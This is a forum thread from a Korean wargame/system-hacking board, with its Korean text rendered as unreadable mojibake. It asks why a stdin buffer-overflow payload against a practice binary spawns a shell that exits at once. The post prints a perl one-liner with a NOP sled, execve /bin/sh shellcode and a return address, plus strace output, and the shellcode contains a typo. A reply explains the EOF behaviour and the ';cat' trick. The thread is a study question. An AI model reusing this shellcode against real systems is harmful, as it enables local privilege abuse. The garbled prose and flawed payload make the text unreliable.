½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   cd80
   http://cd80.tistory.com
   Ç¥ÁØ ÀÔ·Â ¹öÆÛ¿À¹öÇ÷ο쿡¼­ Áú¹®µå¸³´Ï´Ù

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1572 [º¹»ç]


·¹µåÇÞ 6.2ȯ°æ¿¡¼­ ³ª¿Â °á°úµéÀÔ´Ï´Ù

[cd80@leaveret cd80]$ perl -e 'print "\x90"x200, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x37, "\x8c\xfc\xff\xbf"' | strace ./vul

ÀÌ·¸°Ô ½ÇÇà½ÃÅ°¸é ½©ÀÌ ½ÇÇàµÈÈÄ read(0, "", 4096); ÀÌ ÀÚµ¿À¸·Î ½ÇÇàµÇ´øµ¥ ¿Ö ½ÇÇàµÇ´ÂÁö ÀÌÇØ°¡ ¾ÈµÇ³×¿ä
;catºÙÀÌ°í ½ÇÇàÇϸé read(0,  ¿©±â¼­ ÀÔ·ÂÀ» ±â´Ù¸®´Â »óÅ°¡ µÇ±¸¿ä
µÑ´Ù ½ÇÇàÇßÀ»¶§
execve("/bin//sh", ["/bin//sh"]ptrace: umoven: Input/output error
°¡ ¶ß±ä ÇÕ´Ï´Ù
¿©±â¼­ ¶Ç ptrace: umoven: Input/output error°¡ ¾ðÁ¦ ¹ß»ýÇÏ´ÂÁö¸¦ ¸ð¸£°Ú³×¿ä

;cat ¾øÀÌ ÇßÀ» ½Ã

==============================================================
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 3579
fstat64(0, 0xbffffb20)                  = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFIFO|0600, st_size=264, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0

x40015000
read(0, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 4096) = 2

64
read(0, "", 4096)                       = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0
==============================================================

;cat ºÙÀÌ°í ÇßÀ» ½Ã
==============================================================
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 3585
fstat64(0, 0xbffffb20)                  = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFIFO|0600, st_size=264, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0

x40015000
read(0, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 4096) = 2

64
read(0,
==============================================================


À§¿¡ cat ¾ÈºÙ¿´À»¶© read(0, "", 4096); ¿¡¼­ 0ÀÌ ¸®ÅϵǾî EOF·Î ÀνÄÇØ ½©ÀÌ Á¾·áµÇ´Â°Å °°¾Æ¿ä


Q1. Àú¹ø¿¡ stackoverflow.com¿¡¼­ gets()°¡ stdinÀ» º¯¼ö¿¡ º¹»çÇÏ°í stdinÀ» û¼ÒÇØÁØ´Ù°í º»°Å°°Àºµ¥ ÀÌ°Ô ¸Â³ª¿ä? ¸Â´Ù¸é À̰Ͷ§¹®¿¡ read(1, "", 4096);ÀÌ µé¾î°¥¼öµµ ÀÖ³ª¿ä? ±×³É strace /bin/sh¿¡¼­ ÄÁÆ®·Ñ D´©¸£¸é ºñ½ÁÇÏ°Ô read(0, "", 512); °¡ µé¾î°¡°í Á¾·áµÇ±ä Çϰŵç¿ä

Q2. Àú À§¿¡ ptrace: umoven: I/O error°¡ ¿Ö ¹ß»ýÇϴ°ǰ¡¿ä?
  Hit : 5003     Date : 2012/04/27 10:08


    
¸Û¸Û ½©Àº Ç×»ó »ç¿ëÀÚ ÀԷ¿¡ ´ëÇÑ ´ë±â »óÅ°¡ µÇ¾î¾ßÇÏ´Ï read() ÇÔ¼ö´Â ¹«ÇÑ·çÇÁ¸¦ µ¹¸ç ½ÇÇà µÉ °Í °°³×¿ä. catÀ» ¾È ºÙÀ̸é EOF·Î ÀνÄÇؼ­ exitÇÏ´Â °Å ¸Â°í¿ä~ STDINÀÌ ºñ°Ô µÇ´ÂÁö´Â gets() ÇÔ¼ö ÀüÈÄ·Î Çؼ­ Á÷Á¢ È®ÀÎÇغ¸´Â ¹æ¹ýÀÌ °¡Àå È®½ÇÇÕ´Ï´Ù. µð¹ö°Å³ª dumpcode·Î Çغ¸½Ã°í¿ä. STDIN ¹öÆÛÀÇ ÁÖ¼Ò´Â gdb µð¹ö±ë Áß gets()¿¡¼­ ¸ØÃèÀ» ¶§ ctrl+c¸¦ ´©¸£°í ·¹Áö½ºÅ͸¦ º¸¸é ±× Áß Çϳª¿¡ µé¾î ÀÖ½À´Ï´Ù. (stepÀ̳ª next¸¦ Çѵιø ÇØ¾ß ³ª¿Ô´ø °Å °°±âµµ..) ptrace ¿¡·¯ ¿ª½Ã ½©ÀÌ exitµÊ¿¡µû¶ó ³ª¿À´Â °Å °°°í¿ä.. 2012/05/11  
cd80 ¸Û¸Û//
°¨»çÇÕ´Ï´Ù ¸»¾¸ÇØÁֽŠ¹æ¹ýÀ¸·Î ´Ù½ÃÇѹø È®ÀÎÇغÁ¾ß°Ú³×¿ä		 2012/05/11